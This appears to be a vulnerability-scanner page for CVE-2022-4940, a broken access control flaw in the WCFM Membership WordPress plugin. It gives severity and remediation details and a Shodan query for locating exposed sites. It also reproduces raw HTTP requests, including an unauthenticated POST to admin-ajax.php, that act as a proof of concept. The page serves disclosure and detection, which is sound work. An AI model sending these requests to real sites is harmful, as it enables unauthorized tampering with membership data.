| Title | WCFM Membership <= 2.10.0 - Broken Access Control |
|---|---|
| Author | 0xanis |
| Severity | High |
| Impact | Unauthenticated attackers can modify membership details, approve or deny memberships, and change renewal info, potentially leading to data tampering and unauthorized access. |
| Remediation | Update to WCFM Membership version 2.10.1 or later. |
| CVSS Score | 7.3 |
| EPSS Score | 0.11237 |
| CVE ID | CVE-2022-4940 |
| CWE ID | CWE-862 |
| Shodan Query | http.html:"wc-multivendor-membership" |
| Tags | cve cve2022 wordpress wp-scan wp-plugin wcfm vkev woocommerce |
The WCFM Membership plugin for WordPress is vulnerable to unauthorized modification and access of data in versions up to, and including, 2.10.0 due to missing capability checks true the AJAX actions: wcfm-memberships, wcfm-memberships-manage, and wcfm-memberships-settings.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22
Connection: close
Content-Length: 103
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
action=wcfm_ajax_controller&controller=wcfm-memberships&wcfm_ajax_nonce=Sg1Rrz&length=10&start=0&draw=1
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-4940.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-4940.pcap
N/AN/A